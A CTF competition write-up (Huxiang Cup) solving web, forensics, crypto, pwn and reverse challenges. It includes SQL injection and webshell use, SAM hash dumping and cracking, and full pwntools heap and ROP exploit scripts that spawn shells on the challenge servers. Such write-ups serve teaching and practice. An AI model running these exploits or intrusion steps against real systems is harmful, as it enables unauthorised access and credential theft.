湖湘杯 (Huxiang Cup) WriteUp

Category: Reverse Engineering

Web

The challenge name doesn't matter; the challenge was easy anyway

Approach

Unintended solution: the DASFLAG variable was exposed in the phpinfo() output.


NewWebsite

Approach

http://47.111.104.169:56200/?r=content&cid=2

The cid parameter is vulnerable to SQL injection with no filtering at all; the backend credentials turn out to be admin/admin.

In the admin panel, the watermark image area contains a php3 file; visiting it only shows phpinfo(), which is of no use.




Then browsing /upload/watermark/ shows that directory listing is enabled, and there is a shell file in there that the server parses (executes).


http://47.111.104.169:56200/upload/watermark/82061604228330.php3

Blindly guessed the webshell password: cmd.
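As an added example (not part of the write-up), here is a small access-log check for the three things this section exploits: non-numeric cid values, a listable /upload/ directory, and a server-side script under the upload tree. The log lines and rule names are constructed for the demo.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined-log style line; only the fields the checks need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (not from the challenge server) replaying the sequence
# in the write-up: a normal request, SQLi probing of `cid`, a request for the
# listable upload directory, and a request to a .php3 file inside it.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2020:10:00:01 +0800] "GET /?r=content&cid=2 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Nov/2020:10:00:07 +0800] "GET /?r=content&cid=2%27%20and%201=1--%20 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Nov/2020:10:00:09 +0800] "GET /?r=content&cid=2%20union%20select%201,2,3 HTTP/1.1" 200 5233
203.0.113.5 - - [10/Nov/2020:10:03:40 +0800] "GET /upload/watermark/ HTTP/1.1" 200 1830
203.0.113.5 - - [10/Nov/2020:10:03:52 +0800] "POST /upload/watermark/82061604228330.php3 HTTP/1.1" 200 96
198.51.100.9 - - [10/Nov/2020:10:04:00 +0800] "GET /upload/watermark/logo.png HTTP/1.1" 200 40211
"""

SCRIPT_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml")


def findings_for(line):
    """Return a list of (rule, evidence) tuples for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    path = unquote(url.path).lower()
    out = []
    # cid is an integer id in normal traffic; anything else is injection probing.
    for value in parse_qs(url.query, keep_blank_values=True).get("cid", []):
        if not value.isdigit():
            out.append(("cid-not-numeric", value))
    # A 200 for the directory itself means listing is enabled.
    if path.startswith("/upload/") and path.endswith("/") and m["status"] == "200":
        out.append(("upload-dir-listing", path))
    # A server-side script inside an upload tree: webshell or misconfigured handler.
    if path.startswith("/upload/") and path.endswith(SCRIPT_EXTS):
        out.append(("script-under-upload", path))
    return out


def scan(log_text):
    """Map each offending line number (1-based) to its findings."""
    report = {}
    for no, line in enumerate(log_text.splitlines(), 1):
        hits = findings_for(line)
        if hits:
            report[no] = hits
    return report


if __name__ == "__main__":
    for no, hits in scan(SAMPLE_LOG).items():
        print(no, hits)
```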




Misc

password

After downloading and extracting the archive we find the file WIN-BU6IJ7FI9RU-20190927-152050.raw.

Drag it straight into Kali and analyze it with volatility:

volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw imageinfo

It is identified as Win7SP1x86.


volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw --profile=Win7SP1x86 hivelist

Get the virtual address of the SAM hive.



volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw --profile=Win7SP1x86 hashdump -y 0x93fc41e8

Dump the hashes.


Crack the CTF user's hash; the plaintext password is qwer1234.

Then SHA1 it:


db25f2fc14cd2d2b1e7af307241f548fb03c312a


颜文字 (Kaomoji)

Approach

The challenge is called kaomoji, but it actually has little to do with kaomoji.

Opening the packet capture in Wireshark, we find a file index_demo.html; copy its contents out and save them locally.


Opening it locally and viewing the page source reveals a long block of base64-looking text.




A quick search shows this is base64 steganography, and there is a ready-made script online:

https://www.it610.com/article/1290949422569562112.htm

Save the base64 stego text as code.txt; the decoding script (Python 2):

```python
def get_base64_diff_value(s1, s2):
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    res = 0
    for i in xrange(len(s2)):
        if s1[i] != s2[i]:
            # only the last data symbol differs; the index difference is the hidden value
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
    return res


def solve_stego():
    with open('code.txt', 'rb') as f:
        file_lines = f.readlines()
    bin_str = ''
    for line in file_lines:
        steg_line = line.replace('\n', '')
        # decode and re-encode to get the canonical (zero-padded) line
        norm_line = line.replace('\n', '').decode('base64').encode('base64').replace('\n', '')
        diff = get_base64_diff_value(steg_line, norm_line)
        print diff
        pads_num = steg_line.count('=')
        if diff:
            bin_str += bin(diff)[2:].zfill(pads_num * 2)   # two hidden bits per '='
        else:
            bin_str += '0' * pads_num * 2
    print goflag(bin_str)


def goflag(bin_str):
    res_str = ''
    for i in xrange(0, len(bin_str), 8):
        res_str += chr(int(bin_str[i:i + 8], 2))
    return res_str


solve_stego()
```

Running it prints a key.


Then decrypt index_demo.html with snow (whitespace steganography) to obtain its hidden content.

In short: base64 steganography, then snow decryption, then Morse code decoding, which gives

67b33e39b5105fb4a2953a0ce79c3378
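To show how the padding bits carry the hidden data, and how a defender can spot it, here is an added example (not the write-up's script): it hides a message in constructed cover lines, extracts it again, and checks each line against a canonical re-encoding. The cover lines and the message are constructed.

```python
import base64

B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Constructed cover lines (not the challenge's kaomoji). Length mod 3 decides the
# padding, and each '=' leaves two bits of the last data symbol that decoders ignore.
COVERS = [b"a", b"bb", b"cccc", b"ddddd", b"eeeeeee", b"fff", b"g", b"hh"]


def _slot(line):
    """(index of the last data symbol, number of ignored bits) for one base64 line."""
    pad = line.count("=")
    return len(line) - pad - 1, 2 * pad


def hide(covers, secret):
    """Encode each cover and write the secret's bits into the padding-masked bits."""
    bits = "".join(format(b, "08b") for b in secret)
    out = []
    for cover in covers:
        line = base64.b64encode(cover).decode()
        idx, n = _slot(line)
        if n:
            chunk, bits = bits[:n].ljust(n, "0"), bits[n:]
            value = (B64.index(line[idx]) & ~((1 << n) - 1)) | int(chunk, 2)
            line = line[:idx] + B64[value] + line[idx + 1:]
        out.append(line)
    if bits:
        raise ValueError("cover has too little padding capacity")
    return out


def extract(lines):
    """Read the masked bits back; trailing fill bits that do not make a byte are dropped."""
    bits = ""
    for line in lines:
        idx, n = _slot(line)
        if n:
            bits += format(B64.index(line[idx]) & ((1 << n) - 1), "0%db" % n)
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - len(bits) % 8, 8))


def decoded(lines):
    """Ordinary decoding ignores the masked bits, so the cover text survives untouched."""
    return [base64.b64decode(line) for line in lines]


def is_canonical(line):
    """Detection check: a clean encoder zero-fills the masked bits, so decode + re-encode round-trips."""
    return base64.b64encode(base64.b64decode(line)).decode() == line


if __name__ == "__main__":
    stego = hide(COVERS, b"ok")
    print(stego, extract(stego), [is_canonical(l) for l in stego])
```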


隐藏的秘密 (Hidden Secret)

Approach

The hint says the computer has no such user, yet one can still log in. As everyone knows, hidden accounts are usually named like test$.

Next, analyze the attachment with volatility; the version is identified as Win2003SP2x86.


List the users in the SAM hive.

Then batch-crack the obtained NTLM hashes and map the plaintexts back to their usernames, for example:




JbpPIa4$:980099
vz1rKjG$:565656
yW1fMSd$:19861013
oR9C4h0$:a520520
etiH3Lp$:321321

Then just batch-MD5 these.

Then brute-force the flag on the platform. I forgot to take a screenshot the first time, and later attempts no longer worked, so there is no screenshot of the final flag.


虚实之间 (Between the Real and the Fake)

Approach

First, carve the copy of the mingwen file out of the attachment.

Repair the archive with WinRAR's built-in tool, or use 7z, which extracts mingwen副本.txt directly.

Use ARCHPR to run a known-plaintext attack against the encrypted archive.

The attack yields the password.

Open the original encrypted file.


Then apply a rail-fence decode.



Crypto

古典美++ (Classical Beauty++)

Approach


Vigenère cipher encryption/decryption; decrypting on the usual websites requires the key.

There is an open-source project on GitHub that guesses the key:

https://github.com/atomcated/Vigenere


Convert it all to uppercase, ORDERBY, and MD5 it; that is the flag:

C82BBC1AC4AB644C0AA81980ED2EB25B



LFSXOR

Approach

The challenge uses two LFSR pseudo-random generators to produce two keystreams,

and encrypts the content once with each, giving two ciphertexts.

The way in is that the two keystreams have very short periods that are coprime: one is 15, the other 31.

Consequently, one particular key byte of the first keystream ends up encrypting the same plaintext bytes as each of the key bytes of the second keystream.

So, by the involution property of XOR, brute-forcing a single byte of one keystream recovers the whole of the other keystream, which decrypts the ciphertext.


```python
# cipher1 / cipher2 are the two challenge ciphertexts. Their byte-string literals
# lost the backslash escapes during extraction and are not reproduced here; paste
# the challenge ciphertexts in their place.
cipher1 = '...'   # encrypted with keystream 1 (period 15)
cipher2 = '...'   # encrypted with keystream 2 (period 31)

for guess in range(256):            # brute-force byte 0 of keystream 1
    truekey = [0] * 31
    i = 0
    for _ in range(31):
        # positions 0, 15, 30, ... all use keystream-1 byte 0; since gcd(15, 31) == 1
        # these 31 positions hit every index of the 31-byte keystream 2 exactly once
        truekey[i % 31] = chr(ord(cipher1[i]) ^ ord(cipher2[i]) ^ guess)
        i += 15
    flag = ""
    for i in range(len(cipher2)):
        flag += chr(ord(truekey[i % 31]) ^ ord(cipher2[i]))
    if 'DASCTF' in flag:
        print(flag)
```
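An added example, not the challenge's code or ciphertext: two small maximal-length LFSRs with byte periods 15 and 31 encrypt a constructed plaintext, and the recovery generalizes the brute force above by propagating c1[i]^c2[i] = key1[i%15]^key2[i%31] across every position instead of only every 15th, so it also works on ciphertext shorter than 451 bytes. The LFSR taps, seeds and plaintext are assumptions.

```python
PLAINTEXT = b"Two short-period LFSR keystreams reused on one message leak the key: DASCTF{constructed_sample_flag_not_from_the_challenge}"
MARKER = b"DASCTF"


def lfsr_bytes(state, nbits, taps, count):
    """Fibonacci LFSR: emit the low bit, feed back the XOR of the tapped bits, shift right.
    Packing 8 bits per byte keeps a byte period of 2**nbits - 1 because 8 is coprime to it."""
    out = []
    for _ in range(count):
        byte = 0
        for _ in range(8):
            fb = 0
            for t in taps:
                fb ^= (state >> t) & 1
            byte = (byte << 1) | (state & 1)
            state = (state >> 1) | (fb << (nbits - 1))
        out.append(byte)
    return bytes(out)


def period(seq):
    """Smallest shift under which the sample repeats (sample is much longer than the period)."""
    for p in range(1, len(seq)):
        if all(seq[i] == seq[i + p] for i in range(len(seq) - p)):
            return p
    return len(seq)


def xor(data, key):
    return bytes(a ^ b for a, b in zip(data, key))


def recover(c1, c2, p1=15, p2=31, marker=MARKER):
    """Guess key1[0]; every other key byte follows from c1[i]^c2[i] == key1[i%p1]^key2[i%p2]."""
    n = min(len(c1), len(c2))
    diff = [c1[i] ^ c2[i] for i in range(n)]
    for guess in range(256):
        k1, k2 = [None] * p1, [None] * p2
        k1[0] = guess
        changed = True
        while changed:                  # propagate until no unknown is tied to a known byte
            changed = False
            for i in range(n):
                a, b = i % p1, i % p2
                if k1[a] is not None and k2[b] is None:
                    k2[b], changed = k1[a] ^ diff[i], True
                elif k2[b] is not None and k1[a] is None:
                    k1[a], changed = k2[b] ^ diff[i], True
        if None in k1 or None in k2:
            return None                 # too little ciphertext to connect every key byte
        pt = bytes(c2[i] ^ k2[i % p2] for i in range(len(c2)))
        if marker in pt:                # a wrong guess shifts every byte by one XOR constant
            return pt
    return None


def demo():
    ks1 = lfsr_bytes(0b1111, 4, (0, 1), len(PLAINTEXT))    # 4-bit maximal LFSR: byte period 15
    ks2 = lfsr_bytes(0b11111, 5, (0, 2), len(PLAINTEXT))   # 5-bit maximal LFSR: byte period 31
    return recover(xor(PLAINTEXT, ks1), xor(PLAINTEXT, ks2))


if __name__ == "__main__":
    print(demo())
```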

PWN

what the f**k printf?

Approach

After entering fifteen 0x1f's the buffer overflows.

```python
from pwn import *

context.log_level = 'debug'
elf = ELF('./pwn_printf')
p = remote('47.111.96.55', 54606)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

gadget_list = [0x45226, 0x4527a, 0xf0364, 0xf1207]   # one_gadget offsets
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x401213

payload = "0x20" * 15
p.recvuntil('interesting\n')
p.sendline(payload)
payload = "a" * 8
payload += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(pop_rdi_ret)
payload += p64(0x40) + p64(0x4007C6)
p.sendline(payload)

# -----------------------------------------
puts_addr = u64(p.recv(6).ljust(8, '\x00'))
libc_base = puts_addr - libc.symbols['puts']
var = libc_base + gadget_list[2]
# -----------------------------------------

payload = "a" * 8
payload += p64(var)
p.sendline(payload)
p.interactive()
```

737e31e0437d1f6d960ce8d4c887cb9a


Blend_pwn

Approach

```python
# _*_ coding:utf-8 _*_
from pwn import *
import os

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
prog = './blend_pwn'
# elf = ELF(prog)
# p = process(prog)  # ,env={"LD_PRELOAD":"./libc-2.27.so"})
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
p = remote("47.111.104.169", 57704)


def debug(addr, PIE=True):
    debug_str = ""
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        for i in addr:
            debug_str += 'b *{}\n'.format(hex(text_base + i))
        gdb.attach(p, debug_str)
    else:
        for i in addr:
            debug_str += 'b *{}\n'.format(hex(i))   # non-PIE: addresses are absolute
        gdb.attach(p, debug_str)


def dbg():
    gdb.attach(p)


# -----------------------------------------------------------------------------------------
s = lambda data: p.send(str(data))  # in case that data is an int
sa = lambda delim, data: p.sendafter(str(delim), str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(str(delim), str(data))
r = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
it = lambda: p.interactive()
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
bp = lambda bkp: pdbg.bp(bkp)   # leftover from the pwn_debug template; pdbg is not defined here
li = lambda str1, data1: log.success(str1 + '========>' + hex(data1))


def dbgc(addr):
    gdb.attach(p, "b*" + hex(addr) + "\n c")


def lg(s, addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m' % (s, addr))


# The template also carried three unused shellcode string constants (sh_x86_18,
# sh_x86_20, sh_x64_21, credited to https://www.exploit-db.com/shellcodes); the
# exploit never uses them and they are omitted here.
# -----------------------------------------------------------------------------------------

def cho(idx):
    sla("Enter your choice >", str(idx))


def add(con='a'):
    cho(2)
    sla("input note:", con)


def delete(idx):
    cho(3)
    sla("index>", idx)


def sho():
    cho(1)


def show():
    cho(4)


def magic(strt):
    cho(666)   # the original called an undefined `choice`; `cho` is the menu helper
    sla("Please input what you want:", strt)


def exp():
    # debug([0x11cb])
    sla("Please enter a name: ", "%11$p")
    ru("wrong!")
    # ------------------------------------------------------------- leak libc
    sho()
    ru("Current user:")
    ru("0x")
    data = int(r(12), 16)
    addr = data - libc.sym['__libc_start_main'] - 240
    lg('addr', addr)
    one = addr + 0x4526a

    # --------------------------------------------------------------- leak heap
    # magic("a"*0x28)
    pay = p64(one) * 4 + p64(0) * 12
    add(pay)
    add(pay)
    delete(0)
    delete(1)
    show()
    ru("index 2:")
    # ru("0x")
    heap = uu64(r(6))
    lg('heap', heap)

    # --------------------------------------------------------------- trigger
    lg('one', one)
    magic(p64(one) * 4 + p64(heap + 0x20)[0:6])   # the last bytes overwrite rbp

    it()


if __name__ == '__main__':
    exp()
```


babyheap

Approach

```python
# _*_ coding:utf-8 _*_
from pwn_debug import *

pdbg = pwn_debug("babyheap")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
pdbg.local("./libc.so.6")   # 32/64
pdbg.debug("2.27")
pdbg.remote('47.111.104.169', 56303)

switch = 3
if switch == 1:
    p = pdbg.run("local")
elif switch == 2:
    p = pdbg.run("debug")
elif switch == 3:
    p = pdbg.run("remote")
# -----------------------------------------------------------------------------------------
s = lambda data: p.send(str(data))  # in case that data is an int
sa = lambda delim, data: p.sendafter(str(delim), str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(str(delim), str(data))
r = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
it = lambda: p.interactive()
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
bp = lambda bkp: pdbg.bp(bkp)


def bpp():
    bp([])
    # input()


def dbg(arg):
    bp([arg])
    # input()


def lg(s, addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m' % (s, addr))


elf = pdbg.elf
# libc=pdbg.libc
# The unused shellcode template constants (sh_x86_18, sh_x86_20, sh_x64_21, from
# https://www.exploit-db.com/shellcodes) are omitted; the exploit never uses them.
# -----------------------------------------------------------------------------------------
libc = ELF("./libc.so.6")


def cho(idx):
    sla(">>", str(idx))


def add():
    cho(1)
    # sla("input note:",con)


def delete(idx):
    cho(4)
    sla("index?", idx)


def show(idx):
    cho(2)
    sla("index?", str(idx))


def edit(idx, sz, con):
    cho(3)
    sla("index?", str(idx))
    sla("Size:", str(sz))
    sa("Content:", con)


def exp():
    # debug([0xB0C])
    # ----------------------------------------- leak libc & heap
    show(-14)
    ru('\n')
    data = uu64(r(6))
    lg('data', data)
    addr = data - libc.sym['_IO_2_1_stdout_']
    lg('addr', addr)
    fh = addr + libc.sym['__free_hook']
    sys = addr + libc.sym['system']
    lg('sys', sys)

    # ----------------------------------------- shell
    # the steps below are similar to lctf2018-pwn-easy_heap

    # ------------------------ step1
    for i in range(7):
        add()
    for i in range(3):
        add()   # 7 8 9
    for i in range(6):
        delete(i)
    delete(9)
    for i in range(6, 9):
        delete(i)

    # ------------------------ step2
    for i in range(7):
        add()
    add()   # 7
    add()   # 8
    add()   # 9
    for i in range(6):
        delete(i)
    delete(8)   # tcache
    delete(7)
    add()
    # dbg()
    # raw_input()
    edit(0, 0xf8, 'a')
    delete(6)
    delete(9)

    # ------------------------ step3
    for i in range(7):
        add()
    add()
    add()
    add()
    delete(9)
    edit(4, 0x20, '/bin/sh\x00')
    edit(0, 0x20, p64(fh))
    add()
    add()
    edit(11, 8, p64(sys))
    delete(4)

    # dbg()
    it()


if __name__ == '__main__':
    exp()
```


Reverse

easyZ

At first, static analysis kept throwing errors, so I thought the problem was my machine.

While trying dynamic debugging I happened to notice this thing called qemu.

So I went on to set up the environment and debug it dynamically.

It felt like by the time I found the spot, even advanced calculus would be no trouble anymore. Anyway, tough as it was, it got found.

Time to strike back: I started locating things in reverse, found the disassembly, and stepped through the instructions bit by bit.

The program just checks the input length first, then encrypts and compares.

I didn't feel like doing anything fancy; isn't brute force good enough? Can't help but sigh: is that all???


```python
a = [
    0x0000b2b0, 0x00006e72, 0x00006061, 0x0000565d,
    0x0000942d, 0x0000ac79, 0x0000391c, 0x0000643d,
    0x0000ec3f, 0x0000bd10, 0x0000c43e, 0x00007a65,
    0x0000184b, 0x0000ef5b, 0x00005a06, 0x0000a8c0,
    0x0000f64b, 0x0000c774, 0x000002ff, 0x00008e57,
    0x0000aed9, 0x0000d8a9, 0x0000230c, 0x000074e8,
    0x0000c2a6, 0x000088b3, 0x0000af2a, 0x00009ea7,
    0x0000ce8a, 0x00005924, 0x0000d276, 0x000056d4,
    0x000077d7, 0x0000990e, 0x0000b585, 0x00004bcd,
    0x00005277, 0x00001afc, 0x00008c8a, 0x0000cdb5,
    0x00006e26, 0x00004c22, 0x0000673f, 0x0000daff,
    0x00000fac, 0x000086c7, 0x0000e048, 0x0000c483,
    0x000085d3, 0x00002204, 0x0000c2ee, 0x0000e07f,
    0x00000caf, 0x0000bf76, 0x000063fe, 0x0000bffb,
    0x00004b09, 0x0000e5b3, 0x00008bda, 0x000096df,
    0x0000866d, 0x00001719, 0x00006bcf, 0x0000adcc,
    0x00000f2b, 0x000051ce, 0x00001549, 0x000020c1,
    0x00003a8d, 0x000005f5, 0x00005403, 0x00001125,
    0x00009161, 0x0000e2a5, 0x00005196, 0x0000d8d2,
    0x0000d644, 0x0000ee86, 0x00003896, 0x00002e71,
    0x0000a6f1, 0x0000dfcf, 0x00003ece, 0x00007d49,
    0x0000c24d, 0x0000237e, 0x00009352, 0x00007a97,
    0x00007bfa, 0x0000cbaa, 0x000010dc, 0x00003bd9,
    0x00007d7b, 0x00003b88, 0x0000b0d0, 0x0000e8bc
]
b = [
    0x08a73233, 0x116db0f6, 0x0e654937, 0x03c374a7,
    0x16bc8ed9, 0x0846b755, 0x08949f47, 0x04a13c27,
    0x0976cf0a, 0x07461189, 0x1e1a5c12, 0x11e64d96,
    0x03cf09b3, 0x093cb610, 0x0d41ea64, 0x07648050,
    0x092039bf, 0x08e7f1f7, 0x004d871f, 0x1680f823,
    0x06f3c3eb, 0x2205134d, 0x015c6a7c, 0x11c67ed0,
    0x0817b32e, 0x06bd9b92, 0x08806b0c, 0x06aaa515,
    0x205b9f76, 0x0de963e9, 0x2194e8e2, 0x047593bc
]

# flag byte i is the printable j with a[i]*j^2 + a[i+32]*j + a[i+64] == b[i];
# the original indexed a[(i<<2)//4], which is just a[i]
for i in range(32):
    for j in range(32, 127):
        temp = j * j * a[i] + a[i + 32] * j + a[i + 64]
        if temp == b[i]:
            print(chr(j), end='')
            break
```


easyre

Approach


Loading it into IDA shows that main contains no check on the flag itself; there is only a check on the flag's length, which must be 0x18. After that it rets back to the caller. Rather than digging deeper in IDA, I used OllyDbg to debug it dynamically and take a look.


Following on after main returns, there is an encryption routine. First, the first character ANDed with 0xe0 is stored on the stack. Then the first character is shifted left by 3 and the second right by 5, and the two are ORed; the result is XORed with the loop variable, which is the array index. Roughly, the pseudocode is (((input[i] << 3) | (input[i+1] >> 5)) & 0xff) ^ i. Finally, the value saved on the stack is combined with the last byte.

Returning once more, we reach the check, where the data the encrypted flag is compared against can be found.

Bit operations are not reversible by themselves, and my algorithm skills aren't great, so I brute-forced it head-on. Each position's expression can be treated as a constraint; shifts and ORs necessarily admit multiple solutions, and only satisfying all constraints pins down a unique flag. After several attempts I found that each position actually has very few possible values, and under the constraints of the two adjacent positions it becomes fixed, so the brute force can be done segment by segment. (No art here; quick and dirty is how you get first blood.) I'll only give a partial screenshot of the code, not the whole thing; everyone's brute-force code is different anyway.
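An added example, not the author's screenshot code: the transform as read from the description above, with the segment-by-segment constraint search. The exact layout (24-byte input, out[i] = (((s[i] << 3) | (s[i+1] >> 5)) & 0xff) ^ i, with the saved top three bits of s[0] wrapping into the last byte) is an assumption, and the sample input is constructed.

```python
LENGTH = 0x18
PRINTABLE = range(0x20, 0x7f)
SAMPLE = b"flag{built_for_example!}"   # constructed 24-byte input, not the real flag


def transform(s):
    """Assumed encryption: every byte takes its low five bits shifted up and the next
    byte's top three bits, then is XORed with its index; s[0]'s top bits wrap to the end."""
    assert len(s) == LENGTH
    out = []
    for i in range(LENGTH):
        nxt = s[(i + 1) % LENGTH]
        out.append((((s[i] << 3) | (nxt >> 5)) & 0xff) ^ i)
    return bytes(out)


def candidates(target, i):
    """Printable bytes allowed at position i: constraint i fixes the low five bits of
    s[i], constraint i-1 (wrapping) fixes its top three bits."""
    lo5 = (target[i] ^ i) >> 3
    prev = (i - 1) % LENGTH
    hi3 = (target[prev] ^ prev) & 0x07
    return [c for c in PRINTABLE if (c & 0x1f) == lo5 and (c >> 5) == hi3]


def solve(target):
    """Depth-first search over the per-position candidates; the full transform is
    re-checked at the leaf so an inconsistent target returns None."""
    options = [candidates(target, i) for i in range(LENGTH)]
    if any(not o for o in options):
        return None

    def rec(i, acc):
        if i == LENGTH:
            return bytes(acc) if transform(bytes(acc)) == target else None
        for c in options[i]:
            found = rec(i + 1, acc + [c])
            if found:
                return found
        return None

    return rec(0, [])


if __name__ == "__main__":
    enc = transform(SAMPLE)
    print(enc.hex(), solve(enc))
```

With both neighbouring constraints applied, each position is left with exactly one candidate, which is the observation the write-up describes.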



ReMe

Approach

This challenge mainly tests Python decompilation; the exe -> pyc -> py process can be looked up online, so I won't go into it. The decompiled code is as follows:

```python
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 2.7.15+ (default, Aug 31 2018, 11:56:52)
# [GCC 8.2.0]
# Warning: this version of Python has problems handling the Python 3 "byte" type in constants properly.
# Embedded file name: ReMe.py
# Compiled at: 1995-09-28 00:18:56
# Size of source mod 2**32: 272 bytes
import sys, hashlib
check = [
    'e5438e78ec1de10a2693f9cffb930d23', '08e8e8855af8ea652df54845d21b9d67',
    'a905095f0d801abd5865d649a646b397', 'bac8510b0902185146c838cdf8ead8e0',
    'f26f009a6dc171e0ca7a4a770fecd326', 'cffd0b9d37e7187483dc8dd19f4a8fa8',
    '4cb467175ab6763a9867b9ed694a2780', '8e50684ac9ef90dfdc6b2e75f2e23741',
    'cffd0b9d37e7187483dc8dd19f4a8fa8', 'fd311e9877c3db59027597352999e91f',
    '49733de19d912d4ad559736b1ae418a7', '7fb523b42413495cc4e610456d1f1c84',
    '8e50684ac9ef90dfdc6b2e75f2e23741', 'acb465dc618e6754de2193bf0410aafe',
    'bc52c927138231e29e0b05419e741902', '515b7eceeb8f22b53575afec4123e878',
    '451660d67c64da6de6fadc66079e1d8a', '8e50684ac9ef90dfdc6b2e75f2e23741',
    'fe86104ce1853cb140b7ec0412d93837', 'acb465dc618e6754de2193bf0410aafe',
    'c2bab7ea31577b955e2c2cac680fb2f4', '8e50684ac9ef90dfdc6b2e75f2e23741',
    'f077b3a47c09b44d7077877a5aff3699', '620741f57e7fafe43216d6aa51666f1d',
    '9e3b206e50925792c3234036de6a25ab', '49733de19d912d4ad559736b1ae418a7',
    '874992ac91866ce1430687aa9f7121fc']


def func(num):
    # Collatz sequence of num, stopping at 1
    result = []
    while num != 1:
        num = num * 3 + 1 if num % 2 else num // 2
        result.append(num)
    return result


if __name__ == '__main__':
    print('Your input is not the FLAG!')
    inp = input()
    if len(inp) != 27:
        print('length error!')
        sys.exit(-1)
    for i, ch in enumerate(inp):
        ret_list = func(ord(ch))
        s = ''
        for idx in range(len(ret_list)):
            s += str(ret_list[idx])
            s += str(ret_list[(len(ret_list) - idx - 1)])
        md5 = hashlib.md5()
        md5.update(s.encode('utf-8'))
        if md5.hexdigest() != check[i]:
            sys.exit(i)
    md5 = hashlib.md5()
    md5.update(inp.encode('utf-8'))
    print('You win!')
    print('flag{' + md5.hexdigest() + '}')
# okay decompiling 2.pyc
```

With a small change to the source, it produces the flag by itself:

```python
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 2.7.15+ (default, Aug 31 2018, 11:56:52)
# [GCC 8.2.0]
# Warning: this version of Python has problems handling the Python 3 "byte" type in constants properly.
# Embedded file name: ReMe.py
# Compiled at: 1995-09-28 00:18:56
# Size of source mod 2**32: 272 bytes
import sys, hashlib
check = [
    'e5438e78ec1de10a2693f9cffb930d23', '08e8e8855af8ea652df54845d21b9d67',
    'a905095f0d801abd5865d649a646b397', 'bac8510b0902185146c838cdf8ead8e0',
    'f26f009a6dc171e0ca7a4a770fecd326', 'cffd0b9d37e7187483dc8dd19f4a8fa8',
    '4cb467175ab6763a9867b9ed694a2780', '8e50684ac9ef90dfdc6b2e75f2e23741',
    'cffd0b9d37e7187483dc8dd19f4a8fa8', 'fd311e9877c3db59027597352999e91f',
    '49733de19d912d4ad559736b1ae418a7', '7fb523b42413495cc4e610456d1f1c84',
    '8e50684ac9ef90dfdc6b2e75f2e23741', 'acb465dc618e6754de2193bf0410aafe',
    'bc52c927138231e29e0b05419e741902', '515b7eceeb8f22b53575afec4123e878',
    '451660d67c64da6de6fadc66079e1d8a', '8e50684ac9ef90dfdc6b2e75f2e23741',
    'fe86104ce1853cb140b7ec0412d93837', 'acb465dc618e6754de2193bf0410aafe',
    'c2bab7ea31577b955e2c2cac680fb2f4', '8e50684ac9ef90dfdc6b2e75f2e23741',
    'f077b3a47c09b44d7077877a5aff3699', '620741f57e7fafe43216d6aa51666f1d',
    '9e3b206e50925792c3234036de6a25ab', '49733de19d912d4ad559736b1ae418a7',
    '874992ac91866ce1430687aa9f7121fc']


def func(num):
    result = []
    while num != 1:
        num = num * 3 + 1 if num % 2 else num // 2
        result.append(num)
    return result


if __name__ == '__main__':
    flag = ''
    '''
    print('Your input is not the FLAG!')
    inp = input()
    if len(inp) != 27:
        print('length error!')
        sys.exit(-1)
    for i, ch in enumerate(inp):
    '''
    # try every printable byte for each position and keep the one whose hash matches
    for i in range(len(check)):
        for ch in range(32, 128):
            ret_list = func(ch)
            s = ''
            for idx in range(len(ret_list)):
                s += str(ret_list[idx])
                s += str(ret_list[(len(ret_list) - idx - 1)])
            md5 = hashlib.md5()
            md5.update(s.encode('utf-8'))
            if md5.hexdigest() == check[i]:
                flag += chr(ch)
    print(flag)
    '''
    md5 = hashlib.md5()
    md5.update(inp.encode('utf-8'))
    print('You win!')
    print('flag{' + md5.hexdigest() + '}')
    '''
# okay decompiling 2.pyc
```


easy_c++

A warm-up challenge, the most basic reversing.


Here you can see the three key spots, the usual ones: the ciphertext, the encryption algorithm, and the comparison. The algorithm is the most basic XOR, so just run the script:

```python
>>> a = '7d21e<e3<:3;9;ji t r#w"$*{*+*$|,'
>>> flag = ''
>>> for i in range(len(a)):
...     flag += chr(ord(a[i]) ^ i)
...
>>> flag
'7e02a9c4439056df0e2a7b432b0069b3'
```


end


The ChaMd5 CTF team is recruiting on an ongoing basis,

especially crypto, reverse, pwn and smart-contract experts.

Feel free to contact [email protected]





